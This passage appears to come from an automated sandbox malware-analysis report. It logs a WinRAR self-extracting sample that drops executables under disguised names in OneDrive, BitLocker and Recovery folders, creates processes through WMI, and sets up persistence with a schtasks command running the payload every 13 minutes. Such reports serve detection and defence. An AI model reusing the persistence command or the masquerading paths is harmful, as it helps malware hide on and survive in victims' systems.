                                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                                    Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\nGnJvqnFLoRdIZNyVoMyF.exeSection loaded: mscoree.dllJump to behavior
                                    Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\nGnJvqnFLoRdIZNyVoMyF.exeSection loaded: apphelp.dllJump to behavior
                                    Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\nGnJvqnFLoRdIZNyVoMyF.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\nGnJvqnFLoRdIZNyVoMyF.exeSection loaded: version.dllJump to behavior
                                    Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\nGnJvqnFLoRdIZNyVoMyF.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                    Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\nGnJvqnFLoRdIZNyVoMyF.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\nGnJvqnFLoRdIZNyVoMyF.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\nGnJvqnFLoRdIZNyVoMyF.exeSection loaded: windows.storage.dllJump to behavior
                                    Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\nGnJvqnFLoRdIZNyVoMyF.exeSection loaded: wldp.dllJump to behavior
                                    Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\nGnJvqnFLoRdIZNyVoMyF.exeSection loaded: profapi.dllJump to behavior
                                    Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\nGnJvqnFLoRdIZNyVoMyF.exeSection loaded: cryptsp.dllJump to behavior
                                    Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\nGnJvqnFLoRdIZNyVoMyF.exeSection loaded: rsaenh.dllJump to behavior
                                    Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\nGnJvqnFLoRdIZNyVoMyF.exeSection loaded: cryptbase.dllJump to behavior
                                    Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\nGnJvqnFLoRdIZNyVoMyF.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
                                    Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\nGnJvqnFLoRdIZNyVoMyF.exeSection loaded: mscoree.dll
                                    Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\nGnJvqnFLoRdIZNyVoMyF.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\nGnJvqnFLoRdIZNyVoMyF.exeSection loaded: version.dll
                                    Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\nGnJvqnFLoRdIZNyVoMyF.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\nGnJvqnFLoRdIZNyVoMyF.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\nGnJvqnFLoRdIZNyVoMyF.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\nGnJvqnFLoRdIZNyVoMyF.exeSection loaded: windows.storage.dll
                                    Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\nGnJvqnFLoRdIZNyVoMyF.exeSection loaded: wldp.dll
                                    Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\nGnJvqnFLoRdIZNyVoMyF.exeSection loaded: profapi.dll
                                    Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\nGnJvqnFLoRdIZNyVoMyF.exeSection loaded: cryptsp.dll
                                    Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\nGnJvqnFLoRdIZNyVoMyF.exeSection loaded: rsaenh.dll
                                    Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\nGnJvqnFLoRdIZNyVoMyF.exeSection loaded: cryptbase.dll
                                    Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\nGnJvqnFLoRdIZNyVoMyF.exeSection loaded: sspicli.dll
                                    Source: C:\Windows\System32\chcp.comSection loaded: ulib.dll
                                    Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dll
                                    Source: C:\Windows\System32\PING.EXESection loaded: iphlpapi.dll
                                    Source: C:\Windows\System32\PING.EXESection loaded: mswsock.dll
                                    Source: C:\Windows\System32\PING.EXESection loaded: dnsapi.dll
                                    Source: C:\Windows\System32\PING.EXESection loaded: rasadhlp.dll
                                    Source: C:\Windows\System32\PING.EXESection loaded: fwpuclnt.dll
                                    Source: C:\Windows\System32\PING.EXESection loaded: winnsi.dll
                                    Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\nGnJvqnFLoRdIZNyVoMyF.exeSection loaded: mscoree.dll
                                    Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\nGnJvqnFLoRdIZNyVoMyF.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\nGnJvqnFLoRdIZNyVoMyF.exeSection loaded: version.dll
                                    Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\nGnJvqnFLoRdIZNyVoMyF.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\nGnJvqnFLoRdIZNyVoMyF.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\nGnJvqnFLoRdIZNyVoMyF.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\nGnJvqnFLoRdIZNyVoMyF.exeSection loaded: windows.storage.dll
                                    Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\nGnJvqnFLoRdIZNyVoMyF.exeSection loaded: wldp.dll
                                    Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\nGnJvqnFLoRdIZNyVoMyF.exeSection loaded: profapi.dll
                                    Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\nGnJvqnFLoRdIZNyVoMyF.exeSection loaded: cryptsp.dll
                                    Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\nGnJvqnFLoRdIZNyVoMyF.exeSection loaded: rsaenh.dll
                                    Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\nGnJvqnFLoRdIZNyVoMyF.exeSection loaded: cryptbase.dll
                                    Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\nGnJvqnFLoRdIZNyVoMyF.exeSection loaded: sspicli.dll
                                    Source: C:\Users\user\Desktop\f3I38kv.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32Jump to behavior
                                    Source: Window RecorderWindow detected: More than 3 window changes detected
                                    Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                                    Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exeDirectory created: C:\Program Files\Microsoft\OneDrive\ListSync\settings\nGnJvqnFLoRdIZNyVoMyF.exeJump to behavior
                                    Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exeDirectory created: C:\Program Files\Microsoft\OneDrive\ListSync\settings\de83736a915df6Jump to behavior
                                    Source: f3I38kv.exeStatic file information: File size 4183320 > 1048576
                                    Source: f3I38kv.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                                    Source: f3I38kv.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                                    Source: f3I38kv.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                                    Source: f3I38kv.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                                    Source: f3I38kv.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                                    Source: f3I38kv.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                                    Source: f3I38kv.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                    Source: f3I38kv.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                                    Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: f3I38kv.exe
                                    Source: f3I38kv.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                                    Source: f3I38kv.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                                    Source: f3I38kv.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                                    Source: f3I38kv.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                                    Source: f3I38kv.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                                    Source: C:\Users\user\Desktop\f3I38kv.exeFile created: C:\blockbrowserdllCommon\__tmp_rar_sfx_access_check_5204734Jump to behavior
                                    Source: f3I38kv.exeStatic PE information: section name: .didat
                                    Source: C:\Users\user\Desktop\f3I38kv.exeCode function: 0_2_0050F640 push ecx; ret 0_2_0050F653
                                    Source: C:\Users\user\Desktop\f3I38kv.exeCode function: 0_2_0050EB78 push eax; ret 0_2_0050EB96
                                    Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exeCode function: 7_2_00007FFD9BC80C33 push cs; iretd 7_2_00007FFD9BC80C37
                                    Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exeCode function: 7_2_00007FFD9C1CC999 push ecx; iretd 7_2_00007FFD9C1CCB11
                                    Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exeCode function: 7_2_00007FFD9C1C0BA9 push ecx; iretd 7_2_00007FFD9C1C0D21
                                    Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exeCode function: 7_2_00007FFD9C1C7C5F push eax; retf 7_2_00007FFD9C1C7C6D
                                    Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exeCode function: 7_2_00007FFD9C1C4C62 push ecx; iretd 7_2_00007FFD9C1C4C63
                                    Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exeCode function: 7_2_00007FFD9C1C4870 push ecx; iretd 7_2_00007FFD9C1C4871
                                    Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exeCode function: 7_2_00007FFD9C1C746F pushad ; iretd 7_2_00007FFD9C1C749D
                                    Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exeCode function: 7_2_00007FFD9C1D0873 push ecx; iretd 7_2_00007FFD9C1D0874
                                    Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exeCode function: 7_2_00007FFD9C1C749F push eax; iretd 7_2_00007FFD9C1C74AD
                                    Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exeCode function: 7_2_00007FFD9C1C34F2 push ecx; iretd 7_2_00007FFD9C1C34F3
                                    Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exeCode function: 7_2_00007FFD9C1C2D26 push ecx; iretd 7_2_00007FFD9C1C2D27
                                    Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exeCode function: 7_2_00007FFD9C1C8164 push ebx; ret 7_2_00007FFD9C1C816A
                                    Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exeCode function: 7_2_00007FFD9C1CFDD7 push ecx; iretd 7_2_00007FFD9C1CFDD8
                                    Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exeCode function: 7_2_00007FFD9C1C09A8 push ecx; iretd 7_2_00007FFD9C1C09A9
                                    Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exeCode function: 7_2_00007FFD9C1D09E9 push ecx; iretd 7_2_00007FFD9C1D09EA
                                    Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exeCode function: 7_2_00007FFD9C1D0E22 push ecx; iretd 7_2_00007FFD9C1D0E23
                                    Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exeCode function: 7_2_00007FFD9C1D0A30 push ecx; iretd 7_2_00007FFD9C1D0A31
                                    Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exeCode function: 7_2_00007FFD9C1CF6B2 push ecx; iretd 7_2_00007FFD9C1CF6B3
                                    Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exeCode function: 7_2_00007FFD9C1C46B3 push ecx; iretd 7_2_00007FFD9C1C46B4
                                    Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exeCode function: 7_2_00007FFD9C1CC798 push ecx; iretd 7_2_00007FFD9C1CC799
                                    Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exeCode function: 7_2_00007FFD9C1C3C17 push ecx; iretd 7_2_00007FFD9C1C3C18
                                    Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exeCode function: 7_2_00007FFD9C1C4829 push ecx; iretd 7_2_00007FFD9C1C482A
                                    Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exeCode function: 7_2_00007FFD9C1C7C2F pushad ; retf 7_2_00007FFD9C1C7C5D
                                    Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\nGnJvqnFLoRdIZNyVoMyF.exeCode function: 29_2_00007FFD9BAE59D6 push eax; retf 29_2_00007FFD9BAE59DC
                                    Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\nGnJvqnFLoRdIZNyVoMyF.exeCode function: 29_2_00007FFD9BAE48BD push eax; iretd 29_2_00007FFD9BAE48BE
                                    Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\nGnJvqnFLoRdIZNyVoMyF.exeCode function: 29_2_00007FFD9BAE48B6 push eax; iretd 29_2_00007FFD9BAE48B7
                                    Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\nGnJvqnFLoRdIZNyVoMyF.exeCode function: 29_2_00007FFD9BAD31B8 push ds; ret 29_2_00007FFD9BAD31B9
                                    Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\nGnJvqnFLoRdIZNyVoMyF.exeCode function: 29_2_00007FFD9BB1553C push ds; iretd 29_2_00007FFD9BB1556F
                                    Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\nGnJvqnFLoRdIZNyVoMyF.exeCode function: 29_2_00007FFD9BB057E0 push cs; retf 29_2_00007FFD9BB0597F

                                    Persistence and Installation Behavior

                                    barindex
                                    Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exeFile created: C:\Users\user\Desktop\omJXhfZJ.logJump to dropped file
                                    Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exeFile created: C:\Users\user\Desktop\AOsWDEPp.logJump to dropped file
                                    Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exeFile created: C:\Windows\BitLockerDiscoveryVolumeContents\dllhost.exeJump to dropped file
                                    Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exeFile created: C:\Users\user\Desktop\KxLmnhVX.logJump to dropped file
                                    Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exeFile created: C:\Users\user\Saved Games\nGnJvqnFLoRdIZNyVoMyF.exeJump to dropped file
                                    Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exeFile created: C:\Users\user\Desktop\yEVVDmkp.logJump to dropped file
                                    Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exeFile created: C:\Users\user\Desktop\kikGqNQT.logJump to dropped file
                                    Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exeFile created: C:\Users\user\Desktop\DzXmKSai.logJump to dropped file
                                    Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exeFile created: C:\Users\user\Desktop\yVcnRIer.logJump to dropped file
                                    Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exeFile created: C:\Users\user\Desktop\uWPwaYLB.logJump to dropped file
                                    Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exeFile created: C:\Users\user\Desktop\YTwAzGpt.logJump to dropped file
                                    Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exeFile created: C:\Users\user\Desktop\KpbTIyuS.logJump to dropped file
                                    Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exeFile created: C:\Users\user\Desktop\cBDZcTPh.logJump to dropped file
                                    Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exeFile created: C:\Users\user\Desktop\ZLNiVXPn.logJump to dropped file
                                    Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exeFile created: C:\Users\user\Desktop\JsALnyfX.logJump to dropped file
                                    Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exeFile created: C:\Users\user\Desktop\rfYGTcKI.logJump to dropped file
                                    Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exeFile created: C:\Users\user\Desktop\OnCcudVQ.logJump to dropped file
                                    Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exeFile created: C:\Users\user\Desktop\fDqHyDTc.logJump to dropped file
                                    Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exeFile created: C:\Users\user\Desktop\DIumuEtf.logJump to dropped file
                                    Source: C:\Users\user\Desktop\f3I38kv.exeFile created: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exeJump to dropped file
                                    Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exeFile created: C:\Users\user\Desktop\pixyxcvN.logJump to dropped file
                                    Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exeFile created: C:\Users\user\Desktop\scAOpcZD.logJump to dropped file
                                    Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exeFile created: C:\Users\user\Desktop\WahSOJEu.logJump to dropped file
                                    Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exeFile created: C:\Program Files\Microsoft\OneDrive\ListSync\settings\nGnJvqnFLoRdIZNyVoMyF.exeJump to dropped file
                                    Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exeFile created: C:\Users\user\Desktop\wTqFwYZw.logJump to dropped file
                                    Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exeFile created: C:\Users\user\Desktop\PkdkPdkL.logJump to dropped file
                                    Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exeFile created: C:\Users\user\Desktop\hxFqjzFa.logJump to dropped file
                                    Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exeFile created: C:\Users\user\Desktop\nYbxxKQM.logJump to dropped file
                                    Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exeFile created: C:\ProgramData\Microsoft\nGnJvqnFLoRdIZNyVoMyF.exeJump to dropped file
                                    Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exeFile created: C:\Recovery\SIHClient.exeJump to dropped file
                                    Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exeFile created: C:\Users\user\Desktop\wKTFMmGz.logJump to dropped file
                                    Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exeFile created: C:\Users\user\Desktop\azRqGkKl.logJump to dropped file
                                    Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exeFile created: C:\ProgramData\Microsoft\nGnJvqnFLoRdIZNyVoMyF.exeJump to dropped file
                                    Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exeFile created: C:\Windows\BitLockerDiscoveryVolumeContents\dllhost.exeJump to dropped file
                                    Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exeFile created: C:\Users\user\Desktop\wKTFMmGz.logJump to dropped file
                                    Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exeFile created: C:\Users\user\Desktop\pixyxcvN.logJump to dropped file
                                    Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exeFile created: C:\Users\user\Desktop\nYbxxKQM.logJump to dropped file
                                    Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exeFile created: C:\Users\user\Desktop\OnCcudVQ.logJump to dropped file
                                    Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exeFile created: C:\Users\user\Desktop\DzXmKSai.logJump to dropped file
                                    Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exeFile created: C:\Users\user\Desktop\uWPwaYLB.logJump to dropped file
                                    Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exeFile created: C:\Users\user\Desktop\kikGqNQT.logJump to dropped file
                                    Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exeFile created: C:\Users\user\Desktop\azRqGkKl.logJump to dropped file
                                    Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exeFile created: C:\Users\user\Desktop\KxLmnhVX.logJump to dropped file
                                    Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exeFile created: C:\Users\user\Desktop\JsALnyfX.logJump to dropped file
                                    Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exeFile created: C:\Users\user\Desktop\AOsWDEPp.logJump to dropped file
                                    Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exeFile created: C:\Users\user\Desktop\yEVVDmkp.logJump to dropped file
                                    Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exeFile created: C:\Users\user\Desktop\rfYGTcKI.logJump to dropped file
                                    Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exeFile created: C:\Users\user\Desktop\hxFqjzFa.logJump to dropped file
                                    Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exeFile created: C:\Users\user\Desktop\YTwAzGpt.logJump to dropped file
                                    Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exeFile created: C:\Users\user\Desktop\PkdkPdkL.logJump to dropped file
                                    Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exeFile created: C:\Users\user\Desktop\wTqFwYZw.logJump to dropped file
                                    Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exeFile created: C:\Users\user\Desktop\cBDZcTPh.logJump to dropped file
                                    Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exeFile created: C:\Users\user\Desktop\KpbTIyuS.logJump to dropped file
                                    Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exeFile created: C:\Users\user\Desktop\scAOpcZD.logJump to dropped file
                                    Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exeFile created: C:\Users\user\Desktop\ZLNiVXPn.logJump to dropped file
                                    Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exeFile created: C:\Users\user\Desktop\yVcnRIer.logJump to dropped file
                                    Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exeFile created: C:\Users\user\Desktop\omJXhfZJ.logJump to dropped file
                                    Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exeFile created: C:\Users\user\Desktop\fDqHyDTc.logJump to dropped file
                                    Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exeFile created: C:\Users\user\Desktop\WahSOJEu.logJump to dropped file
                                    Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exeFile created: C:\Users\user\Desktop\DIumuEtf.logJump to dropped file

                                    Boot Survival

                                    barindex
                                    Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "nGnJvqnFLoRdIZNyVoMyFn" /sc MINUTE /mo 13 /tr "'C:\Users\All Users\Microsoft\nGnJvqnFLoRdIZNyVoMyF.exe'" /f
                                    Source: C:\Users\user\Desktop\f3I38kv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\blockbrowserdllCommon\hyperruntimemonitorCommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
